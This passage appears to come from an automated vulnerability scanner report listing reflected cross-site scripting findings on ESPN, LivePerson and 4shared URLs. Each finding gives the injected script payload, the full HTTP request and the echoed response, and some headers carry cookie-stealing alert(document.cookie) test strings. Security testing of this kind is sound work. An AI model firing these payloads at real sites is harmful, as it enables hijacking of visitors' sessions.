X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New York Jets decis
...[SNIP]...
<!--url:/newyork/nfl/columns/story?columnist=cimini_rich7fb3d--><script>alert(1)</script>49cb1de33c&id=6124996-->
...[SNIP]...

3.353. http://sports.espn.go.com/new-york/teams/recap [sport parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/teams/recap

Issue detail

The value of the sport request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0be4"><script>alert(1)</script>bd9314bed95 was submitted in the sport parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york/teams/recap?gameId=310530164&sport=ncbc0be4"><script>alert(1)</script>bd9314bed95 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:36 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN09
Cache-Expires: Wed, 23 Feb 2011 23:08:36 GMT
Content-Length: 20995
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Game Recap - ESPN N
...[SNIP]...
<a href="http://sports.espn.go.com/ncbc0be4"><script>alert(1)</script>bd9314bed95/boxscore?gameId=310530164">
...[SNIP]...

3.354. http://sr2.liveperson.net/visitor/addons/deploy.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 875bb%0a4f95fc6c67c was submitted in the site parameter. This input was echoed as 875bb
4f95fc6c67c
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=72961245875bb%0a4f95fc6c67c&d_id=sales HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/en_US/buy/pageType.product/externalRefID.8D6DDFB5?WT.mc_id=ecomaircover_autocollage
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 66
Cache-Control: public, max-age=3600
Date: Tue, 19 Apr 2011 11:24:45 GMT
Connection: close

//Plugins for site 72961245875bb
4f95fc6c67c

lpAddMonitorTag();

3.355. http://static.4shared.com/bundles/css/630963420/css/openid.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/630963420/css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eba06"-alert(1)-"0dae7da8be1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundleseba06"-alert(1)-"0dae7da8be1/css/630963420/css/openid.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundleseba06&quot;-alert(1)-&quot;0dae7da8be1/css/630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2D6048BB9FB76323C5C3BE99CEBF5256.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:33 GMT
Content-Length: 36275


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundleseba06"-alert(1)-"0dae7da8be1/css/630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
functio
...[SNIP]...

3.356. http://static.4shared.com/bundles/css/630963420/css/openid.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/630963420/css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2dac"-alert(1)-"8e22e060db7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/cssc2dac"-alert(1)-"8e22e060db7/630963420/css/openid.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/cssc2dac&quot;-alert(1)-&quot;8e22e060db7/630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FBF240C76EC127DA98FA6F09514E90FB.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:39 GMT
Content-Length: 36264


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/cssc2dac"-alert(1)-"8e22e060db7/630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fe
...[SNIP]...

3.357. http://static.4shared.com/bundles/css/677814427/css/upload-frame.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a0ff"-alert(1)-"7efa6baafe1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles7a0ff"-alert(1)-"7efa6baafe1/css/677814427/css/upload-frame.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles7a0ff&quot;-alert(1)-&quot;7efa6baafe1/css/677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C9A0A5D1372DE2F395F2A8F70FB5F31E.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:57 GMT
Content-Length: 36305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles7a0ff"-alert(1)-"7efa6baafe1/css/677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
f
...[SNIP]...

3.358. http://static.4shared.com/bundles/css/677814427/css/upload-frame.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 783a9"-alert(1)-"fe838ec3fce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css783a9"-alert(1)-"fe838ec3fce/677814427/css/upload-frame.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/css783a9&quot;-alert(1)-&quot;fe838ec3fce/677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=304A6285BAAEAEA780FB81E9E5975246.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:03 GMT
Content-Length: 36305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css783a9"-alert(1)-"fe838ec3fce/677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
funct
...[SNIP]...

3.359. http://static.4shared.com/bundles/css/765844602/css/flags.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/765844602/css/flags.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4888"-alert(1)-"558cf729ae5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundlese4888"-alert(1)-"558cf729ae5/css/765844602/css/flags.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundlese4888&quot;-alert(1)-&quot;558cf729ae5/css/765844602/css/flags.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=12177EB456CEE1C9AFF4E125678D208A.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:56:58 GMT
Content-Length: 36373


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundlese4888"-alert(1)-"558cf729ae5/css/765844602/css/flags.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

3.360. http://static.4shared.com/bundles/css/765844602/css/flags.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/765844602/css/flags.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55cbe"-alert(1)-"bce3fca82c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css55cbe"-alert(1)-"bce3fca82c4/765844602/css/flags.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles/css55cbe&quot;-alert(1)-&quot;bce3fca82c4/765844602/css/flags.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4A31C5648BE49CC8FA265F59DDBF3C6C.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:57:07 GMT
Content-Length: 36373


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css55cbe"-alert(1)-"bce3fca82c4/765844602/css/flags.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fee
...[SNIP]...

3.361. http://static.4shared.com/bundles/css/N162308233/css/network.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/N162308233/css/network.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 499e1"-alert(1)-"af069d79772 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles499e1"-alert(1)-"af069d79772/css/N162308233/css/network.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles499e1&quot;-alert(1)-&quot;af069d79772/css/N162308233/css/network.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8FE0ABC5F9D90922FE6288DE17D525C3.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:56:58 GMT
Content-Length: 36388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles499e1"-alert(1)-"af069d79772/css/N162308233/css/network.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
funct
...[SNIP]...

3.362. http://static.4shared.com/bundles/css/N162308233/css/network.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/N162308233/css/network.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 216fd"-alert(1)-"7a2ba26463d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css216fd"-alert(1)-"7a2ba26463d/N162308233/css/network.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles/css216fd&quot;-alert(1)-&quot;7a2ba26463d/N162308233/css/network.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2B8D94FCBEA8898B3426C9E00B7FE2E5.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:57:07 GMT
Content-Length: 36388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css216fd"-alert(1)-"7a2ba26463d/N162308233/css/network.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

3.363. http://static.4shared.com/bundles/css/N90201876/css/ajax-suggestions.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1530f"-alert(1)-"5c8612fc249 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles1530f"-alert(1)-"5c8612fc249/css/N90201876/css/ajax-suggestions.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles1530f&quot;-alert(1)-&quot;5c8612fc249/css/N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B17461934EAD1091733A85356597E328.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:40 GMT
Content-Length: 36325


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles1530f"-alert(1)-"5c8612fc249/css/N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.364. http://static.4shared.com/bundles/css/N90201876/css/ajax-suggestions.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2117a"-alert(1)-"c970855b872 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css2117a"-alert(1)-"c970855b872/N90201876/css/ajax-suggestions.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/css2117a&quot;-alert(1)-&quot;c970855b872/N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C16C4564F26D125869512CC66192510F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:47 GMT
Content-Length: 36325


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css2117a"-alert(1)-"c970855b872/N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
f
...[SNIP]...

3.365. http://static.4shared.com/bundles/css/gzip_630963420/css/openid.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_630963420/css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 163b1"-alert(1)-"297eae2c019 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

